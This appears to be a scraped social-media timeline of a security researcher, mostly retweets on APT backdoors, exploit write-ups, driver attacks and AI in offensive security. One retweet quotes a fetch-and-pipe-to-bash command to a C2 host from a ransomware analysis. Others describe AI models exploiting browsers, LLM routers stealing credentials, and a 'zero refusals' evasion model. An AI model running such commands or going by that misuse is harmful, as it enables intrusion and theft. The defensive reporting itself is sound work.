hacksys

1.7K posts

@flopyash

At Blackhat & Defcon 25

England · Joined February 2018
1.7K Following · 813 Followers
Pinned Tweet
hacksys @flopyash
🚨 THE $1 BLACK FRIDAY STEAL IS HERE! Get the @cyberwarfarelab Infinity Subscription Plan for just $1/Year. 🔥 130+ Labs (AI, Cloud, K8s, APT Labs) ⏳ Ends Nov 30 - Go to infinity.cyberwarfare.live - Select "Pro Plan" - Code: BLACKFRIDAY25 #BlackFriday
hacksys retweeted
Y Combinator @ycombinator
AI has stopped being a feature and started being the foundation. We're excited about a new wave of startups rebuilding software, services, and silicon— and pushing AI into the physical world. ycombinator.com/rfs
hacksys retweeted
Vitaly Kamluk @vkamluk
After 11 years of silence at Black Hat, I am delivering a speech today. In memory of a legendary APT Hunter, Mr Sergey Mineev, who passed away 40 days ago. If you cannot attend, here is the write-up: sentinelone.com/labs/fast16-my…
hacksys retweeted
Chaofan Shou @Fried_rice
Chinese LLMs can hack better than state-sponsored hackers with a properly evolved harness - Kimi K2.5 managed to find and exploit 6 vulnerabilities in browsers: a single page view or an extension install by victims equals a full system hijack. Check arxiv.org/abs/2604.20801
hacksys retweeted
Elastic Security Labs @elasticseclabs
LLMs have gotten good enough at reverse engineering to recover source code from obfuscated binaries with real accuracy. So we asked the obvious next question: how fast and cheap is it to use one to build obfuscation specifically designed to beat it?
We benchmarked Claude Opus 4.6 against the Tigress obfuscator across 20 targets first, to map its strengths and failure modes. 40% solve rate. Phase 3 multi-layer combos hit 0%, with cost explosions that killed the runs.
Then we ran a dev/test/refine loop to build 3 purpose-built obfuscation variants targeting the same crackme, iterating directly against the model's known weaknesses.
The finding: LLM-targeted obfuscation is fast and cheap to develop. Context windows, budget caps, and shortcut biases are all exploitable attack surfaces. The arms race just shifted.
hacksys retweeted
Julian Horoszkiewicz @ewilded
Finally, it is published 😁 Making Vulnerable Drivers Exploitable Without Hardware - my latest research on driver vulnerability hardware-gating, explaining the concept of hardware-dependent code and diving deep into creative deployment techniques - software-emulated phantom devices, driver restacking, and forced driver replacement — all explored through the lens of Bring Your Own Vulnerable Driver (BYOVD) attacks: atos.net/wp-content/upl…
hacksys retweeted
Md Ismail Šojal 🕷️ @0x0SojalSec
A fully local 26B MoE model was built for red teaming and bug hunting. Trained on elite bug reports and real evasion tactics. DPO fine-tuned for hunter mindset. Claude sees your payloads in logs; that's why BugTraceAI Apex 26B local MoE for real red teamers.
- executes WAF bypasses with internal thinking blocks.
- It enforces deep internal reasoning before generating any output.
- Delivers production-grade WAF/EDR evasion with AES-256-GCM obfuscation.
- Zero refusals, Trained on real-world elite reports and evasion techniques. Fits in 16.7GB. Runs on RTX 3060.
- huggingface.co/BugTraceAI/Bug…
hacksys retweeted
Elastic Security Labs @elasticseclabs
One command. No file written to disk. Full code execution inside a container. curl -fsSL [C2]:666/files/proxy. sh | bash This is how TeamPCP's container ransomware operation starts. Elastic Security Labs walked the full attack chain using Defend for Containers (D4C) to show exactly what runtime signals surface at every stage.
hacksys retweeted
AI Security Institute @AISecurityInst
We conducted cyber evaluations of Claude Mythos Preview and found that it is the first model to complete an AISI cyber range end-to-end. 🧵
hacksys retweeted
Chaofan Shou @Fried_rice
26 LLM routers are secretly injecting malicious tool calls and stealing creds. One drained our client's $500k wallet. We also managed to poison routers to forward traffic to us. Within several hours, we can directly take over ~400 hosts. Check our paper: arxiv.org/abs/2604.08407
hacksys retweeted
ZachXBT @zachxbt
1/ Recently an unnamed source shared data exfiltrated from an internal North Korean payment server containing 390 accounts, chat logs, crypto transactions. I spent long hours going through all of it, none of which has ever been publicly released. It revealed an intricate ~$1M/month scheme of fraudulent identities, forged legal documents, and crypto-to-fiat conversion. Enjoy the findings!
hacksys retweeted
ö @r0keb
Good morning! Just published a blog post exploiting a VMware Guest To Host. A UaF Heap Feng Shui base address leakage to bypass ASLR and a stack-based buffer overflow to achieve RCE. r0keb.github.io/posts/VMware-G…
hacksys retweeted
Malware Unicorn @malwareunicorn
New blog: We found a sandbox breakout and remote dev tunnel bug in Cursor. Called it NomShub. It was fun making my vscode dev tunnel C2 dashboard pink. na2.hubs.ly/H04GPbw0
hacksys retweeted
Andrej Karpathy @karpathy
LLM Knowledge Bases
Something I'm finding very useful recently: using LLMs to build personal knowledge bases for various topics of research interest. In this way, a large fraction of my recent token throughput is going less into manipulating code, and more into manipulating knowledge (stored as markdown and images). The latest LLMs are quite good at it. So:
Data ingest: I index source documents (articles, papers, repos, datasets, images, etc.) into a raw/ directory, then I use an LLM to incrementally "compile" a wiki, which is just a collection of .md files in a directory structure. The wiki includes summaries of all the data in raw/, backlinks, and then it categorizes data into concepts, writes articles for them, and links them all. To convert web articles into .md files I like to use the Obsidian Web Clipper extension, and then I also use a hotkey to download all the related images to local so that my LLM can easily reference them.
IDE: I use Obsidian as the IDE "frontend" where I can view the raw data, the compiled wiki, and the derived visualizations. Important to note that the LLM writes and maintains all of the data of the wiki, I rarely touch it directly. I've played with a few Obsidian plugins to render and view data in other ways (e.g. Marp for slides).
Q&A: Where things get interesting is that once your wiki is big enough (e.g. mine on some recent research is ~100 articles and ~400K words), you can ask your LLM agent all kinds of complex questions against the wiki, and it will go off, research the answers, etc. I thought I had to reach for fancy RAG, but the LLM has been pretty good about auto-maintaining index files and brief summaries of all the documents and it reads all the important related data fairly easily at this ~small scale.
Output: Instead of getting answers in text/terminal, I like to have it render markdown files for me, or slide shows (Marp format), or matplotlib images, all of which I then view again in Obsidian. You can imagine many other visual output formats depending on the query. Often, I end up "filing" the outputs back into the wiki to enhance it for further queries. So my own explorations and queries always "add up" in the knowledge base.
Linting: I've run some LLM "health checks" over the wiki to e.g. find inconsistent data, impute missing data (with web searchers), find interesting connections for new article candidates, etc., to incrementally clean up the wiki and enhance its overall data integrity. The LLMs are quite good at suggesting further questions to ask and look into.
Extra tools: I find myself developing additional tools to process the data, e.g. I vibe coded a small and naive search engine over the wiki, which I both use directly (in a web ui), but more often I want to hand it off to an LLM via CLI as a tool for larger queries.
Further explorations: As the repo grows, the natural desire is to also think about synthetic data generation + finetuning to have your LLM "know" the data in its weights instead of just context windows.
TLDR: raw data from a given number of sources is collected, then compiled by an LLM into a .md wiki, then operated on by various CLIs by the LLM to do Q&A and to incrementally enhance the wiki, and all of it viewable in Obsidian. You rarely ever write or edit the wiki manually, it's the domain of the LLM. I think there is room here for an incredible new product instead of a hacky collection of scripts.
hacksys retweeted
Nicolas Chatelain @Nicocha30
Introducing Ligolo-IWA! If you love Ligolo-ng but struggle with proxies, EDRs, or AppLocker policies, this is for you. Ligolo-IWA runs directly from Chromium-based browsers (Edge/Chrome) to bypass standard host restrictions and corporate filters. iwa.ligolo.ng
hacksys retweeted
Matt Harrison @__mharrison__
For my friends who are still using UV and might be a little wary about recent compromises to PyPI packages, stick this in your pyproject.toml. You can let all of those pip users find and report the compromises...
hacksys retweeted
Lukasz Olejnik @lukOlejnik
A China-linked cyber threat group has been quietly operating inside telecom networks, prepositioned. Dormant presence meant to be used later. The tool BPFdoor is a Linux backdoor that works at low level in telecommunication core infrastructure. This improves stealth and covert activity. When listing processes or connections, those are not visible (like the 90s and 00s kernel rootkits, so let's call it 26-year-surprising). It can also hide its activation signal inside normal HTTPS network traffic (web browser-like), lets the network's own SSL decryption layer termination decrypt it, and then fires commands. This means that web application firewalls and proxies are effectively bypassed. BPFdoor has been found monitoring SCTP traffic. SCTP is the protocol that carries 4G and 5G signalling between core telecom network functions -- registration requests, subscriber identity, device location updates.
hacksys retweeted
DFIR Radar @DFIR_Radar
Chinese 🇨🇳 APT group Red Menshen plants kernel-level BPFdoor backdoors in global telecom networks, creating "sleeper cells" for long-term espionage. New variants hide in HTTPS traffic and monitor 4G/5G signaling protocols.
Key findings:
• BPFdoor evolved from magic packet activation to Layer-7 HTTPS camouflage with RC4-MD5 encryption
• Implants target SCTP signaling protocols used in 4G/5G core networks for subscriber tracking
• Masquerades as legitimate services like HPE ProLiant hardware daemons and Docker containers
• ICMP tunneling enables covert C2 between compromised hosts using 0xFFFFFFFF terminal markers
• Affects telecom edge infrastructure: Ivanti VPNs, Cisco/Juniper routers, Fortinet firewalls
Attack chain leverages:
• Initial access via T1190 exploitation of public-facing telecom appliances
• CrossC2 beacons for Linux post-exploitation and lateral movement
• TinyShell passive backdoors on boundary devices for persistence
• Custom keyloggers with telecom-specific credential lists (usernames like "imsi")
DFIR artifacts include raw socket usage, anomalous BPF filters in kernel space, unexpected hardware service processes on non-HPE systems, and HTTPS traffic with fixed-offset padding schemes. Hunt for unusual BPF syscalls, processes mimicking bare-metal hardware services on virtualized systems, and SCTP traffic inspection on non-telecom hosts. #DFIR_Radar